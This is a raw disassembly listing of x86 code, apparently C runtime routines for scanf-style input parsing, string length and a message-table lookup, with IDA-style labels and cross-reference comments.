mov [ebp+var_1C0], edi
cmp edi, 6Eh
jz short loc_41EFC5
cmp edi, 63h
jz loc_41F031
cmp edi, 7Bh
jz loc_41F031
loc_41EFA4: ; CODE XREF: sub_41ED2E+28F�j
inc [ebp+var_184]
mov edx, [ebp+arg_0]
call sub_41ED18
mov esi, eax
push esi
call sub_41A861
pop ecx
test eax, eax
jnz short loc_41EFA4
mov [ebp+var_194], esi
loc_41EFC5: ; CODE XREF: sub_41ED2E+262�j
mov esi, [ebp+arg_0]
loc_41EFC8: ; CODE XREF: sub_41ED2E+319�j
mov ecx, [ebp+var_1B4]
test ecx, ecx
jz short loc_41EFDF
cmp [ebp+var_18C], 0
jz loc_41F2D5
loc_41EFDF: ; CODE XREF: sub_41ED2E+2A2�j
cmp edi, 6Fh
jg loc_41F2A1
jz loc_41F6C2
cmp edi, 63h
jz loc_41F274
cmp edi, 64h
jz loc_41F6C2
jle loc_41F2C7
cmp edi, 67h
jle short loc_41F06A
cmp edi, 69h
jz short loc_41F04C
cmp edi, 6Eh
jnz loc_41F2C7
mov eax, [ebp+var_184]
cmp [ebp+var_18E], 0
jz loc_41F996
jmp loc_41F9C2
; ---------------------------------------------------------------------------
loc_41F031: ; CODE XREF: sub_41ED2E+267�j
; sub_41ED2E+270�j
inc [ebp+var_184]
mov esi, [ebp+arg_0]
mov edx, esi
call sub_41ED18
mov [ebp+var_194], eax
jmp loc_41EFC8
; ---------------------------------------------------------------------------
loc_41F04C: ; CODE XREF: sub_41ED2E+2E0�j
push 64h
pop edi
loc_41F04F: ; CODE XREF: sub_41ED2E+58E�j
mov ebx, [ebp+var_194]
cmp ebx, 2Dh
jnz loc_41F570
mov [ebp+var_197], 1
jmp loc_41F575
; ---------------------------------------------------------------------------
loc_41F06A: ; CODE XREF: sub_41ED2E+2DB�j
lea esi, [ebp+var_17C]
mov ebx, [ebp+var_194]
cmp ebx, 2Dh
jnz short loc_41F089
mov [ebp+var_17C], bl
lea esi, [ebp+var_17B]
jmp short loc_41F08E
; ---------------------------------------------------------------------------
loc_41F089: ; CODE XREF: sub_41ED2E+34B�j
cmp ebx, 2Bh
jnz short loc_41F0AE
loc_41F08E: ; CODE XREF: sub_41ED2E+359�j
dec [ebp+var_18C]
inc [ebp+var_184]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
jmp short loc_41F0B1
; ---------------------------------------------------------------------------
loc_41F0AE: ; CODE XREF: sub_41ED2E+35E�j
mov edi, [ebp+arg_0]
loc_41F0B1: ; CODE XREF: sub_41ED2E+37E�j
cmp [ebp+var_1B4], 0
jz short loc_41F0C6
cmp [ebp+var_18C], 15Dh
jle short loc_41F100
loc_41F0C6: ; CODE XREF: sub_41ED2E+38A�j
mov [ebp+var_18C], 15Dh
jmp short loc_41F100
; ---------------------------------------------------------------------------
loc_41F0D2: ; CODE XREF: sub_41ED2E+3DB�j
mov eax, [ebp+var_18C]
dec [ebp+var_18C]
test eax, eax
jz short loc_41F10B
inc [ebp+var_19C]
mov [esi], bl
inc esi
inc [ebp+var_184]
mov edx, edi
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
loc_41F100: ; CODE XREF: sub_41ED2E+396�j
; sub_41ED2E+3A2�j
push ebx
call sub_41A7E8
pop ecx
test eax, eax
jnz short loc_41F0D2
loc_41F10B: ; CODE XREF: sub_41ED2E+3B2�j
cmp byte_42A564, bl
jnz short loc_41F175
mov eax, [ebp+var_18C]
dec [ebp+var_18C]
test eax, eax
jz short loc_41F175
inc [ebp+var_184]
mov edx, edi
call sub_41ED18
mov ebx, eax
mov al, byte_42A564
mov [esi], al
inc esi
jmp short loc_41F164
; ---------------------------------------------------------------------------
loc_41F13C: ; CODE XREF: sub_41ED2E+445�j
mov eax, [ebp+var_18C]
dec [ebp+var_18C]
test eax, eax
jz short loc_41F175
inc [ebp+var_19C]
mov [esi], bl
inc esi
inc [ebp+var_184]
mov edx, edi
call sub_41ED18
mov ebx, eax
loc_41F164: ; CODE XREF: sub_41ED2E+40C�j
push ebx
mov [ebp+var_194], ebx
call sub_41A7E8
pop ecx
test eax, eax
jnz short loc_41F13C
loc_41F175: ; CODE XREF: sub_41ED2E+3E3�j
; sub_41ED2E+3F3�j ...
cmp [ebp+var_19C], 0
jz loc_41F219
cmp ebx, 65h
jz short loc_41F190
cmp ebx, 45h
jnz loc_41F219
loc_41F190: ; CODE XREF: sub_41ED2E+457�j
mov eax, [ebp+var_18C]
dec [ebp+var_18C]
test eax, eax
jz short loc_41F219
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_184]
mov edx, edi
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
cmp ebx, 2Dh
jnz short loc_41F1C3
mov [esi], al
inc esi
jmp short loc_41F1C8
; ---------------------------------------------------------------------------
loc_41F1C3: ; CODE XREF: sub_41ED2E+48E�j
cmp ebx, 2Bh
jnz short loc_41F20E
loc_41F1C8: ; CODE XREF: sub_41ED2E+493�j
mov eax, [ebp+var_18C]
dec [ebp+var_18C]
test eax, eax
jnz short loc_41F1F9
and [ebp+var_18C], eax
jmp short loc_41F20E
; ---------------------------------------------------------------------------
loc_41F1E0: ; CODE XREF: sub_41ED2E+4E9�j
mov eax, [ebp+var_18C]
dec [ebp+var_18C]
test eax, eax
jz short loc_41F219
inc [ebp+var_19C]
mov [esi], bl
inc esi
loc_41F1F9: ; CODE XREF: sub_41ED2E+4A8�j
mov edx, edi
inc [ebp+var_184]
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
loc_41F20E: ; CODE XREF: sub_41ED2E+498�j
; sub_41ED2E+4B0�j
push ebx
call sub_41A7E8
pop ecx
test eax, eax
jnz short loc_41F1E0
loc_41F219: ; CODE XREF: sub_41ED2E+44E�j
; sub_41ED2E+45C�j ...
dec [ebp+var_184]
cmp ebx, 0FFFFFFFFh
jz short loc_41F22D
push edi
push ebx
call sub_4226E6
pop ecx
pop ecx
loc_41F22D: ; CODE XREF: sub_41ED2E+4F4�j
cmp [ebp+var_19C], 0
jz loc_41FA63
cmp [ebp+var_18E], 0
jnz loc_41F9C2
inc [ebp+var_1B8]
mov byte ptr [esi], 0
lea eax, [ebp+var_17C]
push eax
push [ebp+var_1B0]
movsx eax, [ebp+var_18D]
dec eax
push eax
call off_42AD18
add esp, 0Ch
jmp loc_41F9C2
; ---------------------------------------------------------------------------
loc_41F274: ; CODE XREF: sub_41ED2E+2C3�j
test ecx, ecx
jnz short loc_41F288
mov [ebp+var_1B4], 1
inc [ebp+var_18C]
loc_41F288: ; CODE XREF: sub_41ED2E+548�j
; sub_41ED2E+581�j
cmp [ebp+var_185], 0
jle loc_41F452
mov [ebp+var_196], 1
jmp loc_41F452
; ---------------------------------------------------------------------------
loc_41F2A1: ; CODE XREF: sub_41ED2E+2B4�j
mov eax, edi
sub eax, 70h
jz loc_41F6BB
sub eax, 3
jz short loc_41F288
dec eax
dec eax
jz loc_41F6C2
sub eax, 3
jz loc_41F04F
sub eax, 3
jz short loc_41F302
loc_41F2C7: ; CODE XREF: sub_41ED2E+2D2�j
; sub_41ED2E+2E5�j
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, [ebp+var_194]
jz short loc_41F2E1
loc_41F2D5: ; CODE XREF: sub_41ED2E+2AB�j
cmp [ebp+var_194], 0FFFFFFFFh
jmp loc_41FA2A
; ---------------------------------------------------------------------------
loc_41F2E1: ; CODE XREF: sub_41ED2E+5A5�j
dec [ebp+var_195]
cmp [ebp+var_18E], 0
jnz loc_41F9C2
mov eax, [ebp+var_1DC]
mov [ebp+arg_8], eax
jmp loc_41F9C2
; ---------------------------------------------------------------------------
loc_41F302: ; CODE XREF: sub_41ED2E+597�j
cmp [ebp+var_185], 0
jle short loc_41F312
mov [ebp+var_196], 1
loc_41F312: ; CODE XREF: sub_41ED2E+5DB�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1D0], edi
cmp byte ptr [edi], 5Eh
jnz short loc_41F332
inc edi
mov [ebp+var_1D0], edi
mov [ebp+var_1A1], 0FFh
loc_41F332: ; CODE XREF: sub_41ED2E+5F4�j
mov ebx, [ebp+var_1BC]
test ebx, ebx
jnz short loc_41F399
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_1BC], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41F399
; ---------------------------------------------------------------------------
loc_41F358: ; DATA XREF: UPX0:stru_4255B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41F35C: ; DATA XREF: UPX0:stru_4255B0�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
push 20h
call sub_419DCB
pop ecx
mov [ebp+var_1BC], eax
test eax, eax
jnz short loc_41F37F
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_41FA63
; ---------------------------------------------------------------------------
loc_41F37F: ; CODE XREF: sub_41ED2E+646�j
mov [ebp+var_1D8], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1D0]
mov ebx, [ebp+var_1BC]
loc_41F399: ; CODE XREF: sub_41ED2E+60C�j
; sub_41ED2E+628�j
push 20h
push 0
push ebx
call sub_420CC0
add esp, 0Ch
cmp [ebp+var_1C0], 7Bh
jnz short loc_41F426
cmp byte ptr [edi], 5Dh
jnz short loc_41F426
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_41F42C
; ---------------------------------------------------------------------------
loc_41F3BD: ; CODE XREF: sub_41ED2E+702�j
inc edi
cmp al, 2Dh
jnz short loc_41F40D
test dl, dl
jz short loc_41F40D
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41F40D
inc edi
cmp dl, cl
jnb short loc_41F3D6
mov al, cl
jmp short loc_41F3DA
; ---------------------------------------------------------------------------
loc_41F3D6: ; CODE XREF: sub_41ED2E+6A2�j
mov al, dl
mov dl, cl
loc_41F3DA: ; CODE XREF: sub_41ED2E+6A6�j
cmp dl, al
ja short loc_41F409
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D4], eax
loc_41F3EE: ; CODE XREF: sub_41ED2E+6D9�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D4]
jnz short loc_41F3EE
loc_41F409: ; CODE XREF: sub_41ED2E+6AE�j
xor dl, dl
jmp short loc_41F42C
; ---------------------------------------------------------------------------
loc_41F40D: ; CODE XREF: sub_41ED2E+692�j
; sub_41ED2E+696�j ...
mov [ebp+var_198], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_41F426: ; CODE XREF: sub_41ED2E+67F�j
; sub_41ED2E+684�j
mov dl, [ebp+var_198]
loc_41F42C: ; CODE XREF: sub_41ED2E+68D�j
; sub_41ED2E+6DD�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_41F3BD
test al, al
jz loc_41FA63
mov ebx, [ebp+var_1B0]
cmp [ebp+var_1C0], 7Bh
jnz short loc_41F44C
mov [ebp+arg_4], edi
loc_41F44C: ; CODE XREF: sub_41ED2E+719�j
mov edi, [ebp+var_1C0]
loc_41F452: ; CODE XREF: sub_41ED2E+561�j
; sub_41ED2E+56E�j
mov esi, ebx
dec [ebp+var_184]
cmp [ebp+var_194], 0FFFFFFFFh
jz short loc_41F473
push [ebp+arg_0]
push [ebp+var_194]
call sub_4226E6
pop ecx
pop ecx
loc_41F473: ; CODE XREF: sub_41ED2E+733�j
; sub_41ED2E+924�j ...
cmp [ebp+var_1B4], 0
jz short loc_41F490
mov eax, [ebp+var_18C]
dec [ebp+var_18C]
test eax, eax
jz loc_41F673
loc_41F490: ; CODE XREF: sub_41ED2E+74C�j
inc [ebp+var_184]
mov edx, [ebp+arg_0]
call sub_41ED18
mov [ebp+var_194], eax
cmp eax, 0FFFFFFFFh
jz loc_41F65D
cmp edi, 63h
jz short loc_41F4FF
cmp edi, 73h
jnz short loc_41F4C6
cmp eax, 9
jl short loc_41F4C1
cmp eax, 0Dh
jle short loc_41F4C6
loc_41F4C1: ; CODE XREF: sub_41ED2E+78C�j
cmp eax, 20h
jnz short loc_41F4FF
loc_41F4C6: ; CODE XREF: sub_41ED2E+787�j
; sub_41ED2E+791�j
cmp edi, 7Bh
jnz loc_41F65D
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_1BC]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_1A1]
xor ecx, edi
test edx, ecx
jz loc_41F65D
mov edi, [ebp+var_1C0]
loc_41F4FF: ; CODE XREF: sub_41ED2E+782�j
; sub_41ED2E+796�j
cmp [ebp+var_18E], 0
jnz loc_41F657
cmp [ebp+var_196], 0
jz loc_41F649
mov [ebp+var_1C4], al
movzx eax, al
mov ecx, off_42AB04
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41F543
inc [ebp+var_184]
mov edx, [ebp+arg_0]
call sub_41ED18
mov [ebp+var_1C3], al
loc_41F543: ; CODE XREF: sub_41ED2E+7FF�j
push dword_42A560
lea eax, [ebp+var_1C4]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_422812
add esp, 0Ch
mov ax, [ebp+var_1CC]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_41F64C
; ---------------------------------------------------------------------------
loc_41F570: ; CODE XREF: sub_41ED2E+32A�j
cmp ebx, 2Bh
jnz short loc_41F59F
loc_41F575: ; CODE XREF: sub_41ED2E+337�j
dec [ebp+var_18C]
jnz short loc_41F58A
test ecx, ecx
jz short loc_41F58A
mov [ebp+var_17D], 1
jmp short loc_41F59F
; ---------------------------------------------------------------------------
loc_41F58A: ; CODE XREF: sub_41ED2E+84D�j
; sub_41ED2E+851�j
inc [ebp+var_184]
mov edx, esi
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
loc_41F59F: ; CODE XREF: sub_41ED2E+845�j
; sub_41ED2E+85A�j
cmp ebx, 30h
jnz loc_41F705
inc [ebp+var_184]
mov edx, esi
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
cmp bl, 78h
jz short loc_41F611
cmp bl, 58h
jz short loc_41F611
mov [ebp+var_19C], 1
cmp edi, 78h
jz short loc_41F5F5
cmp [ebp+var_1B4], 0
jz short loc_41F5ED
dec [ebp+var_18C]
jnz short loc_41F5ED
inc [ebp+var_17D]
loc_41F5ED: ; CODE XREF: sub_41ED2E+8AF�j
; sub_41ED2E+8B7�j
push 6Fh
loc_41F5EF: ; CODE XREF: sub_41ED2E+919�j
pop edi
jmp loc_41F705
; ---------------------------------------------------------------------------
loc_41F5F5: ; CODE XREF: sub_41ED2E+8A6�j
dec [ebp+var_184]
cmp ebx, 0FFFFFFFFh
jz short loc_41F609
push esi
push ebx
call sub_4226E6
pop ecx
pop ecx
loc_41F609: ; CODE XREF: sub_41ED2E+8D0�j
push 30h
pop ebx
jmp loc_41F6FF
; ---------------------------------------------------------------------------
loc_41F611: ; CODE XREF: sub_41ED2E+892�j
; sub_41ED2E+897�j
inc [ebp+var_184]
mov edx, esi
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
cmp [ebp+var_1B4], 0
jz short loc_41F645
sub [ebp+var_18C], 2
cmp [ebp+var_18C], 1
jge short loc_41F645
inc [ebp+var_17D]
loc_41F645: ; CODE XREF: sub_41ED2E+8FF�j
; sub_41ED2E+90F�j
push 78h
jmp short loc_41F5EF
; ---------------------------------------------------------------------------
loc_41F649: ; CODE XREF: sub_41ED2E+7E5�j
mov [ebx], al
inc ebx
loc_41F64C: ; CODE XREF: sub_41ED2E+83D�j
mov [ebp+var_1B0], ebx
jmp loc_41F473
; ---------------------------------------------------------------------------
loc_41F657: ; CODE XREF: sub_41ED2E+7D8�j
inc esi
jmp loc_41F473
; ---------------------------------------------------------------------------
loc_41F65D: ; CODE XREF: sub_41ED2E+779�j
; sub_41ED2E+79B�j ...
dec [ebp+var_184]
cmp eax, 0FFFFFFFFh
jz short loc_41F673
push [ebp+arg_0]
push eax
call sub_4226E6
pop ecx
pop ecx
loc_41F673: ; CODE XREF: sub_41ED2E+75C�j
; sub_41ED2E+938�j
cmp esi, ebx
jz loc_41FA63
cmp [ebp+var_18E], 0
jnz loc_41F9C2
inc [ebp+var_1B8]
cmp [ebp+var_1C0], 63h
jz loc_41F9C2
mov eax, [ebp+var_1B0]
cmp [ebp+var_196], 0
jz short loc_41F6B3
and word ptr [eax], 0
jmp loc_41F9C2
; ---------------------------------------------------------------------------
loc_41F6B3: ; CODE XREF: sub_41ED2E+97A�j
mov byte ptr [eax], 0
jmp loc_41F9C2
; ---------------------------------------------------------------------------
loc_41F6BB: ; CODE XREF: sub_41ED2E+578�j
mov [ebp+var_18D], 1
loc_41F6C2: ; CODE XREF: sub_41ED2E+2BA�j
; sub_41ED2E+2CC�j ...
mov ebx, [ebp+var_194]
cmp ebx, 2Dh
jnz short loc_41F6D6
mov [ebp+var_197], 1
jmp short loc_41F6DB
; ---------------------------------------------------------------------------
loc_41F6D6: ; CODE XREF: sub_41ED2E+99D�j
cmp ebx, 2Bh
jnz short loc_41F705
loc_41F6DB: ; CODE XREF: sub_41ED2E+9A6�j
dec [ebp+var_18C]
jnz short loc_41F6F0
test ecx, ecx
jz short loc_41F6F0
mov [ebp+var_17D], 1
jmp short loc_41F705
; ---------------------------------------------------------------------------
loc_41F6F0: ; CODE XREF: sub_41ED2E+9B3�j
; sub_41ED2E+9B7�j
inc [ebp+var_184]
mov edx, esi
call sub_41ED18
mov ebx, eax
loc_41F6FF: ; CODE XREF: sub_41ED2E+8DE�j
mov [ebp+var_194], ebx
loc_41F705: ; CODE XREF: sub_41ED2E+874�j
; sub_41ED2E+8C2�j ...
cmp [ebp+var_1C8], 0
jz loc_41F86F
cmp [ebp+var_17D], 0
jnz loc_41F83E
loc_41F71F: ; CODE XREF: sub_41ED2E+B04�j
cmp edi, 78h
jz short loc_41F78A
cmp edi, 70h
jz short loc_41F78A
push ebx
call sub_41A7E8
pop ecx
test eax, eax
jz loc_41F7C7
cmp edi, 6Fh
jnz short loc_41F767
cmp ebx, 38h
jge loc_41F7C7
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1A8]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_1AC], eax
mov [ebp+var_1A8], ecx
jmp short loc_41F7CD
; ---------------------------------------------------------------------------
loc_41F767: ; CODE XREF: sub_41ED2E+A0D�j
push 0
push 0Ah
push [ebp+var_1A8]
push [ebp+var_1AC]
call sub_41CF60
mov [ebp+var_1AC], eax
mov [ebp+var_1A8], edx
jmp short loc_41F7CD
; ---------------------------------------------------------------------------
loc_41F78A: ; CODE XREF: sub_41ED2E+9F4�j
; sub_41ED2E+9F9�j
push ebx
call sub_41A822
pop ecx
test eax, eax
jz short loc_41F7C7
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1A8]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_1AC], eax
mov [ebp+var_1A8], ecx
push ebx
call sub_41A7E8
pop ecx
test eax, eax
jnz short loc_41F7CD
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_41F7CD
; ---------------------------------------------------------------------------
loc_41F7C7: ; CODE XREF: sub_41ED2E+A04�j
; sub_41ED2E+A12�j ...
inc [ebp+var_17D]
loc_41F7CD: ; CODE XREF: sub_41ED2E+A37�j
; sub_41ED2E+A5A�j ...
cmp [ebp+var_17D], 0
jnz short loc_41F817
inc [ebp+var_19C]
lea eax, [ebx-30h]
cdq
add [ebp+var_1AC], eax
adc [ebp+var_1A8], edx
cmp [ebp+var_1B4], 0
jz short loc_41F806
dec [ebp+var_18C]
jnz short loc_41F806
mov [ebp+var_17D], 1
jmp short loc_41F82B
; ---------------------------------------------------------------------------
loc_41F806: ; CODE XREF: sub_41ED2E+AC5�j
; sub_41ED2E+ACD�j
inc [ebp+var_184]
mov edx, esi
call sub_41ED18
mov ebx, eax
jmp short loc_41F82B
; ---------------------------------------------------------------------------
loc_41F817: ; CODE XREF: sub_41ED2E+AA6�j
dec [ebp+var_184]
cmp ebx, 0FFFFFFFFh
jz short loc_41F82B
push esi
push ebx
call sub_4226E6
pop ecx
pop ecx
loc_41F82B: ; CODE XREF: sub_41ED2E+AD6�j
; sub_41ED2E+AE7�j ...
cmp [ebp+var_17D], 0
jz loc_41F71F
mov [ebp+var_194], ebx
loc_41F83E: ; CODE XREF: sub_41ED2E+9EB�j
cmp [ebp+var_197], 0
jz loc_41F962
mov eax, [ebp+var_1AC]
neg eax
mov ecx, [ebp+var_1A8]
adc ecx, 0
neg ecx
mov [ebp+var_1AC], eax
mov [ebp+var_1A8], ecx
jmp loc_41F962
; ---------------------------------------------------------------------------
loc_41F86F: ; CODE XREF: sub_41ED2E+9DE�j
cmp [ebp+var_17D], 0
jnz loc_41F953
loc_41F87C: ; CODE XREF: sub_41ED2E+C19�j
cmp edi, 78h
jz short loc_41F8B7
cmp edi, 70h
jz short loc_41F8B7
push ebx
call sub_41A7E8
pop ecx
test eax, eax
jz short loc_41F8DC
cmp edi, 6Fh
jnz short loc_41F8A4
cmp ebx, 38h
jge short loc_41F8DC
shl [ebp+var_1A0], 3
jmp short loc_41F8E2
; ---------------------------------------------------------------------------
loc_41F8A4: ; CODE XREF: sub_41ED2E+B66�j
mov eax, [ebp+var_1A0]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_1A0], eax
jmp short loc_41F8E2
; ---------------------------------------------------------------------------
loc_41F8B7: ; CODE XREF: sub_41ED2E+B51�j
; sub_41ED2E+B56�j
push ebx
call sub_41A822
pop ecx
test eax, eax
jz short loc_41F8DC
shl [ebp+var_1A0], 4
push ebx
call sub_41A7E8
pop ecx
test eax, eax
jnz short loc_41F8E2
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_41F8E2
; ---------------------------------------------------------------------------
loc_41F8DC: ; CODE XREF: sub_41ED2E+B61�j
; sub_41ED2E+B6B�j ...
inc [ebp+var_17D]
loc_41F8E2: ; CODE XREF: sub_41ED2E+B74�j
; sub_41ED2E+B87�j ...
cmp [ebp+var_17D], 0
jnz short loc_41F92C
inc [ebp+var_19C]
mov eax, [ebp+var_1A0]
lea eax, [eax+ebx-30h]
mov [ebp+var_1A0], eax
cmp [ebp+var_1B4], 0
jz short loc_41F91B
dec [ebp+var_18C]
jnz short loc_41F91B
mov [ebp+var_17D], 1
jmp short loc_41F940
; ---------------------------------------------------------------------------
loc_41F91B: ; CODE XREF: sub_41ED2E+BDA�j
; sub_41ED2E+BE2�j
inc [ebp+var_184]
mov edx, esi
call sub_41ED18
mov ebx, eax
jmp short loc_41F940
; ---------------------------------------------------------------------------
loc_41F92C: ; CODE XREF: sub_41ED2E+BBB�j
dec [ebp+var_184]
cmp ebx, 0FFFFFFFFh
jz short loc_41F940
push esi
push ebx
call sub_4226E6
pop ecx
pop ecx
loc_41F940: ; CODE XREF: sub_41ED2E+BEB�j
; sub_41ED2E+BFC�j ...
cmp [ebp+var_17D], 0
jz loc_41F87C
mov [ebp+var_194], ebx
loc_41F953: ; CODE XREF: sub_41ED2E+B48�j
cmp [ebp+var_197], 0
jz short loc_41F962
neg [ebp+var_1A0]
loc_41F962: ; CODE XREF: sub_41ED2E+B17�j
; sub_41ED2E+B3C�j ...
cmp edi, 46h
jnz short loc_41F96E
and [ebp+var_19C], 0
loc_41F96E: ; CODE XREF: sub_41ED2E+C37�j
cmp [ebp+var_19C], 0
jz loc_41FA63
cmp [ebp+var_18E], 0
jnz short loc_41F9C2
inc [ebp+var_1B8]
mov ebx, [ebp+var_1B0]
mov eax, [ebp+var_1A0]
loc_41F996: ; CODE XREF: sub_41ED2E+2F8�j
cmp [ebp+var_1C8], 0
jz short loc_41F9B2
mov eax, [ebp+var_1AC]
mov [ebx], eax
mov eax, [ebp+var_1A8]
mov [ebx+4], eax
jmp short loc_41F9C2
; ---------------------------------------------------------------------------
loc_41F9B2: ; CODE XREF: sub_41ED2E+C6F�j
cmp [ebp+var_18D], 0
jz short loc_41F9BF
mov [ebx], eax
jmp short loc_41F9C2
; ---------------------------------------------------------------------------
loc_41F9BF: ; CODE XREF: sub_41ED2E+C8B�j
mov [ebx], ax
loc_41F9C2: ; CODE XREF: sub_41ED2E+2FE�j
; sub_41ED2E+513�j ...
inc [ebp+var_195]
inc [ebp+arg_4]
jmp short loc_41FA44
; ---------------------------------------------------------------------------
loc_41F9CD: ; CODE XREF: sub_41ED2E+AB�j
inc [ebp+var_184]
mov edx, [ebp+arg_0]
call sub_41ED18
mov ebx, eax
mov [ebp+var_194], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_41FA27
movzx eax, bl
mov ecx, off_42AB04
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41FA44
inc [ebp+var_184]
mov edx, [ebp+arg_0]
call sub_41ED18
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_41FA3E
cmp eax, 0FFFFFFFFh
jz short loc_41FA27
push [ebp+arg_0]
push eax
call sub_4226E6
pop ecx
pop ecx
loc_41FA27: ; CODE XREF: sub_41ED2E+CBE�j
; sub_41ED2E+CEC�j
cmp ebx, 0FFFFFFFFh
loc_41FA2A: ; CODE XREF: sub_41ED2E+5AE�j
jz short loc_41FA63
push [ebp+arg_0]
push [ebp+var_194]
call sub_4226E6
pop ecx
pop ecx
jmp short loc_41FA63
; ---------------------------------------------------------------------------
loc_41FA3E: ; CODE XREF: sub_41ED2E+CE7�j
dec [ebp+var_184]
loc_41FA44: ; CODE XREF: sub_41ED2E+C9D�j
; sub_41ED2E+CCE�j
cmp [ebp+var_194], 0FFFFFFFFh
jnz loc_41ED71
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 25h
jnz short loc_41FA63
cmp byte ptr [eax+1], 6Eh
jz loc_41ED71
loc_41FA63: ; CODE XREF: sub_41ED2E+4A�j
; sub_41ED2E+506�j ...
cmp [ebp+var_1D8], 1
jnz short loc_41FA78
push [ebp+var_1BC]
call sub_419DDD
pop ecx
loc_41FA78: ; CODE XREF: sub_41ED2E+D3C�j
mov eax, [ebp+var_1B8]
cmp [ebp+var_194], 0FFFFFFFFh
jnz short loc_41FA96
test eax, eax
jnz short loc_41FA96
cmp [ebp+var_195], al
jnz short loc_41FA96
or eax, 0FFFFFFFFh
loc_41FA96: ; CODE XREF: sub_41ED2E+D57�j
; sub_41ED2E+D5B�j ...
lea esp, [ebp-1E8h]
mov ecx, [ebp+var_1C]
call sub_4192B6
call __SEH_epilog
retn
sub_41ED2E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41FAB0 proc near ; CODE XREF: sub_41A3A5+17�p
; sub_41AC59+10�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_41FAE0
loc_41FABC: ; CODE XREF: sub_41FAB0+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41FB13
test ecx, 3
jnz short loc_41FABC
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_41FAE0: ; CODE XREF: sub_41FAB0+A�j
; sub_41FAB0+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41FAE0
mov eax, [ecx-4]
test al, al
jz short loc_41FB31
test ah, ah
jz short loc_41FB27
test eax, 0FF0000h
jz short loc_41FB1D
test eax, 0FF000000h
jz short loc_41FB13
jmp short loc_41FAE0
; ---------------------------------------------------------------------------
loc_41FB13: ; CODE XREF: sub_41FAB0+13�j
; sub_41FAB0+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41FB1D: ; CODE XREF: sub_41FAB0+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41FB27: ; CODE XREF: sub_41FAB0+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41FB31: ; CODE XREF: sub_41FAB0+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_41FAB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=8Ch
sub_41FB3B proc near ; CODE XREF: sub_41A4AE+12�p
; sub_41A4D3+12�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-8Ch]
sub esp, 10Ch
mov eax, dword_42A290
mov ecx, [ebp+8Ch+arg_0]
push ebx
push esi
mov [ebp+8Ch+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_41FB61: ; CODE XREF: sub_41FB3B+33�j
cmp ecx, dword_42A9C0[eax*8]
jz short loc_41FB70
inc eax
cmp eax, 13h
jb short loc_41FB61
loc_41FB70: ; CODE XREF: sub_41FB3B+2D�j
mov esi, eax
shl esi, 3
cmp ecx, dword_42A9C0[esi]
jnz loc_41FC96
mov eax, dword_44BEB8
cmp eax, 1
jz loc_41FC6E
cmp eax, edx
jnz short loc_41FBA0
cmp dword_42A2D4, 1
jz loc_41FC6E
